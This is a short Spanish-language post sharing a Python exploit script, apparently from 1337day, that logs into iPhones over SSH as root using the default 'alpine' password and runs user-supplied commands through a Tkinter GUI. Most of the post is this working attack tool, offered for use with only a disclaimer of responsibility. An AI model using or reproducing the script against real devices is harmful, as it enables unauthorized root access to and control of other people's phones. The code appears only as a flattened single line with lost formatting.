Exploit Title: [GUI]Apple iPhone iOS Default SSH Remote Command Execution exploit

Al parecer en los dispositivos iOS se puede hacer ejecución de código remoto mediante ssh, D35m0nd142 hace un exploit demostrando esta acción.

Comparto el enlace en 1137day y el codigo.http://1337day.com/exploits/14805

#!/usr/bin/python# When you've launched the command look the terminal# This software work without Metasploit # Exploit Title: [GUI]Apple iPhone iOS Default SSH Remote Command Execution exploit# Exploit Author: D35m0nd142# Vendor Homepage: http://www.apple.com# Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premiumimport paramiko import Tkinter from tkMessageBox import *import sysimport osprint "******************************************************************"print "*Apple iPhone iOS Default SSH Remote Command Execution exploit   *"print "*                 Created by D35m0nd142                          *"print "******************************************************************\n" root=Tkinter.Tk()root.geometry("%dx%d" % (490,220))def exploit(): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ip_iphone=ip.get() ssh.connect(ip_iphone,username='root',password='alpine') cmd=command.get() stdin, stdout, stderr = ssh.exec_command(cmd) print stdout.readlines() ok=Tkinter.Label(text="Command executed",bg="blue",fg="yellow").pack()  ssh.close()root['bg']="black"root.title("Apple iOS Default SSH Remote Command Execution exploit")message=showwarning("Warning","D35m0nd142 isn't responsable for your use of this software")developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')ip_label=Tkinter.Label(text="iPhone IP: ").pack()ip=Tkinter.StringVar()ip_entry=Tkinter.Entry(textvariable=ip).pack()command_label=Tkinter.Label(text="Command to execute: ").pack()command=Tkinter.StringVar()command_entry=Tkinter.Entry(textvariable=command).pack()launch_exploit=Tkinter.Button(text="Exploit",command=exploit).pack()root.mainloop()